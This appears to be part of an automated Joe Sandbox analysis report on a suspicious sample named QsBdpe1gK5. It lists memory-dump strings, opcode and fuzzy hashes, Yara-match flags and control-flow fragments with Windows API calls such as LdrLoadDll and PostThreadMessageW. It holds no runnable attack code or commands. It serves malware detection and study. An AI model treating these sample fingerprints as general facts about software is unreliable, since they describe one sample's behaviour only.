                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TJpq$Tekq$xbnq
                                                                                                                                        • API String ID: 0-3321955333
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ?gN$xBR
                                                                                                                                        • API String ID: 0-2937344748
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ,.R
                                                                                                                                        • API String ID: 0-136454914
                                                                                                                                        • Opcode ID: 2bb7f3698451b9ba2ce5abe92f97b3f72823d4ff40cde9fcd5d4b0c96f2fdcfa
                                                                                                                                        • Instruction ID: d23ca44372864f7f05101a8604378c7808ef280094c88cd2c3d763a8a3dcc63d
                                                                                                                                        • Opcode Fuzzy Hash: 2bb7f3698451b9ba2ce5abe92f97b3f72823d4ff40cde9fcd5d4b0c96f2fdcfa
                                                                                                                                        • Instruction Fuzzy Hash: 9CE1E9B4E002598FDB14CFA9D5909AEBBF2FF89304F248159E418AB355D734AD81CFA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq
                                                                                                                                        • API String ID: 0-3255046985
                                                                                                                                        • Opcode ID: 8593c4d18c07cae660ad6f2f4a289dd7df31d326e595d6fee48370b17ed8fe0b
                                                                                                                                        • Instruction ID: 217bc9eb2291c13c674567e6694bcec3ee6a202573af55c1390397ccdc4680d0
                                                                                                                                        • Opcode Fuzzy Hash: 8593c4d18c07cae660ad6f2f4a289dd7df31d326e595d6fee48370b17ed8fe0b
                                                                                                                                        • Instruction Fuzzy Hash: BB611B70A152099FDB08DF7BE94569ABBF2FBC8300F14D429D418973A8EF345A45CB80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bafdea963b2429acce81b77ab967d13dcaf3a512e63503dfd78809c74cfa7d63
                                                                                                                                        • Instruction ID: 24bad5b7e962d017d208fccf4dc9ef974f089e74976930ce537691d5cb7f21da
                                                                                                                                        • Opcode Fuzzy Hash: bafdea963b2429acce81b77ab967d13dcaf3a512e63503dfd78809c74cfa7d63
                                                                                                                                        • Instruction Fuzzy Hash: E1E1F9B4E002598FDB14CFA9D5909AEBBF2FF89304F248159D419AB356D734AD81CFA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b52e5268bd0355a90f6740f15cb62a0e2f1edc8679272682a93d1a32b8212294
                                                                                                                                        • Instruction ID: 6fff95bfdaf86b2b0f16dd57de80573ca51603786e88e33f10b77b7f94137e3c
                                                                                                                                        • Opcode Fuzzy Hash: b52e5268bd0355a90f6740f15cb62a0e2f1edc8679272682a93d1a32b8212294
                                                                                                                                        • Instruction Fuzzy Hash: 48E1FAB4E002598FDB14CFA9D5909AEFBF2FF89304F248159E419AB355D731A981CFA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5266283d97c09f5939d24e8678e2a8d324a93cddb4973e5aa8de23051041e488
                                                                                                                                        • Instruction ID: f48dddfe17b39d7dbaa5a8e5bc1d75496fdfd2746064cae37cec310d9a2b947c
                                                                                                                                        • Opcode Fuzzy Hash: 5266283d97c09f5939d24e8678e2a8d324a93cddb4973e5aa8de23051041e488
                                                                                                                                        • Instruction Fuzzy Hash: 8FE1FBB4E00259CFDB14DFA9D5919AEBBF2FF89304F248159D418AB359D730A981CFA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b9f56d33b9d9c3d67c7a457e0be0e475ef0a23695c5251e4c8a8a9227be11b4e
                                                                                                                                        • Instruction ID: 3e6903044c0a1f881daf03e04a0437bf852453535181ec9579a1340375f7847c
                                                                                                                                        • Opcode Fuzzy Hash: b9f56d33b9d9c3d67c7a457e0be0e475ef0a23695c5251e4c8a8a9227be11b4e
                                                                                                                                        • Instruction Fuzzy Hash: 77A14C7AE0230ACFCF05DFA4C8445EEB7B2FF85300B15856AE805AB265DB79E955CB40

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                        Signature Coverage:7.6%
                                                                                                                                        Total number of Nodes:145
                                                                                                                                        Total number of Limit Nodes:12

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 114 417993-4179bc call 42f533 118 4179c2-4179d0 call 42fb33 114->118 119 4179be-4179c1 114->119 122 4179e0-4179f1 call 42dfe3 118->122 123 4179d2-4179dd call 42fdd3 118->123 128 4179f3-417a07 LdrLoadDll 122->128 129 417a0a-417a0d 122->129 123->122 128->129
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A05
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction ID: c05735af9d87ff809b405e5c58a4850cca5856ce1274a566620df5b546512d83
                                                                                                                                        • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction Fuzzy Hash: 290171B1E0020DBBDF10DBE5DC42FDEB7B89B54308F4041AAE90897240F634EB488B95

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 140 42c8c3-42c8fc call 4046d3 call 42dad3 NtClose
                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction ID: 133e63d4455ab17c9b30316577fb7d960e1753245c68e5cabd7d79e4ae334b6d
                                                                                                                                        • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction Fuzzy Hash: 46E086356042147BD120EB5AEC41F9B775CDFC5754F408419FA09A7241C6B5B91187F5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 154 1132b60-1132b6c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: ceefda4a6eb240a5209e3f9ffc8411d2ad1740f30cec2c4e7087aa16d852cbbb
                                                                                                                                        • Instruction ID: 9a20eaa00d1d9d57c58f939d4bee42cfa58ab8e17cbba23e4709a2a2f635dfe2
                                                                                                                                        • Opcode Fuzzy Hash: ceefda4a6eb240a5209e3f9ffc8411d2ad1740f30cec2c4e7087aa16d852cbbb
                                                                                                                                        • Instruction Fuzzy Hash: AA90026120240003410971984514616400A97E0601B65C021E1015590DC66589916225
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: aff0ca782836778a5290371c666e3d635037ffba66bc02d01b2c9b034ed15762
                                                                                                                                        • Instruction ID: b6811c708fdffc44daf7f05b0493d658dd95002e8ef673b6ab54c8679d1782e1
                                                                                                                                        • Opcode Fuzzy Hash: aff0ca782836778a5290371c666e3d635037ffba66bc02d01b2c9b034ed15762
                                                                                                                                        • Instruction Fuzzy Hash: 4B90023120140413D11571984604707000997D0641FA5C412A0425558DD7968A52A221

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 155 1132c70-1132c7c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4fc9e783739ef0e220597acbe817c38c7f552e1f668356de9d31031f2005bd07
                                                                                                                                        • Instruction ID: 7dd2fe59ea6a9a921d717e30ff8bb1f1c84733920668d6ee630e638c586304a0
                                                                                                                                        • Opcode Fuzzy Hash: 4fc9e783739ef0e220597acbe817c38c7f552e1f668356de9d31031f2005bd07
                                                                                                                                        • Instruction Fuzzy Hash: C890023120148803D1147198850474A000597D0701F69C411A4425658DC7D589917221
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 30e0705fa839f3a82514422120df2bb8a7e723d037231c414561f35edaca0444
                                                                                                                                        • Instruction ID: 01d975d27a0be138c51d5e1cb2cb365fce5f2803321ab11f2a8dcb8f91e59774
                                                                                                                                        • Opcode Fuzzy Hash: 30e0705fa839f3a82514422120df2bb8a7e723d037231c414561f35edaca0444
                                                                                                                                        • Instruction Fuzzy Hash: EE90023160550403D10471984614706100597D0601F75C411A0425568DC7D58A5166A2

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                                                                        • Instruction ID: 7251796555732349115f912c6c4c209aa57bdead8f3eb1923ae9839e20d07678
                                                                                                                                        • Opcode Fuzzy Hash: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                                                                        • Instruction Fuzzy Hash: A721FEB2A092587ADB015BB85C418FEBB6CCF42374B0482AFF884DB282D26D4D8343D1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                                                                        • Instruction ID: fb6054b137b1b7a90670ef45b58f19e18da369be72312329e7a814f8d004de60
                                                                                                                                        • Opcode Fuzzy Hash: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                                                                        • Instruction Fuzzy Hash: D601DBB1D4021C7EEB11AAE59C81DEF7B7CDF41798F04806AF904B7241E67C4E4647A5

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                                                                        • Instruction ID: 304f4617cef094d7948f8b4e0ba8c288fe5f41b46d30d6681db389c3092ba291
                                                                                                                                        • Opcode Fuzzy Hash: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                                                                        • Instruction Fuzzy Hash: 8601DBB1D0021C7ADB10AAE59C81DEF7B7CDF41798F04806AF90467241E67C4E4647A5

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                                                                        • Instruction ID: a03890bf0caf07f143295e344698684d57de9b4f9a149aaa8d59faff12e514fd
                                                                                                                                        • Opcode Fuzzy Hash: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                                                                        • Instruction Fuzzy Hash: 150166B2D04218B9DB10EAA58C82CEF7B7CDF81358F0481AAF914B7240D67C4A474BA4

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 130 42cbc3-42cc01 call 4046d3 call 42dad3 RtlAllocateHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E774,?,?,00000000,?,0041E774,?,?,?), ref: 0042CBFC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction ID: d1daadd5b738771fcf8a8578342262517393979b432d42d69ec70eba3b553b61
                                                                                                                                        • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction Fuzzy Hash: 48E092716042087FC610EE59EC42E9B37ACDFC9754F008419F908A7242D670BD1087B9

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 135 42cc03-42cc44 call 4046d3 call 42dad3 RtlFreeHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,004171F6,000000F4), ref: 0042CC3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction ID: a8743f59d5fd6b324e8fb9b63301b2ee65a769d322d9c6f3b811b81c9c5f29be
                                                                                                                                        • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction Fuzzy Hash: D1E092716042157BC610EE49DC41F9B73ACDFC5710F004419FE08A7242D670BD2087B8

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 145 42cc53-42cc8f call 4046d3 call 42dad3 ExitProcess
                                                                                                                                        APIs
                                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,BED2F641,?,?,BED2F641), ref: 0042CC8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                        • Opcode ID: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                                                                        • Instruction ID: f890e39a49fc289f0e184355a012a96589c9f26d3f4f8871f3224b84e537ea6d
                                                                                                                                        • Opcode Fuzzy Hash: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                                                                        • Instruction Fuzzy Hash: 74E08C326042247BD220FA5ADC02FDB77ACDFC5714F01481AFA09A7242C6B5B91287F9

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 150 1132c0a-1132c0f 151 1132c11-1132c18 150->151 152 1132c1f-1132c26 LdrInitializeThunk 150->152
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: d0ac78a821e553f496b1346f02da212d5607a22724d5a3345611a8194af64e9f
                                                                                                                                        • Instruction ID: 1bcf1448e8b057792c4a874cf4917706ec0f32475fc27b7f80784b1320e2fbe3
                                                                                                                                        • Opcode Fuzzy Hash: d0ac78a821e553f496b1346f02da212d5607a22724d5a3345611a8194af64e9f
                                                                                                                                        • Instruction Fuzzy Hash: 59B09B719015C5C6DA15F7A44708717790077D0701F35C061D2030641F4778D1D1E275
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                        Strings
                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0116542B
                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01165508
                                                                                                                                        • Thread identifier, xrefs: 0116553A
                                                                                                                                        • Critical section address., xrefs: 01165502
                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0116540A, 01165496, 01165519
                                                                                                                                        • Critical section debug info address, xrefs: 0116541F, 0116552E
                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011654CE
                                                                                                                                        • Address of the debug info found in the active list., xrefs: 011654AE, 011654FA
                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01165543
                                                                                                                                        • 8, xrefs: 011652E3
                                                                                                                                        • corrupted critical section, xrefs: 011654C2
                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 011654B6
                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011654E2
                                                                                                                                        • Critical section address, xrefs: 01165425, 011654BC, 01165534
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                        Strings
                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01162506
                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01162602
                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01162624
                                                                                                                                        • @, xrefs: 0116259B
                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01162498
                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011624C0
                                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011622E4
                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01162412
                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0116261F
                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01162409
                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011625EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
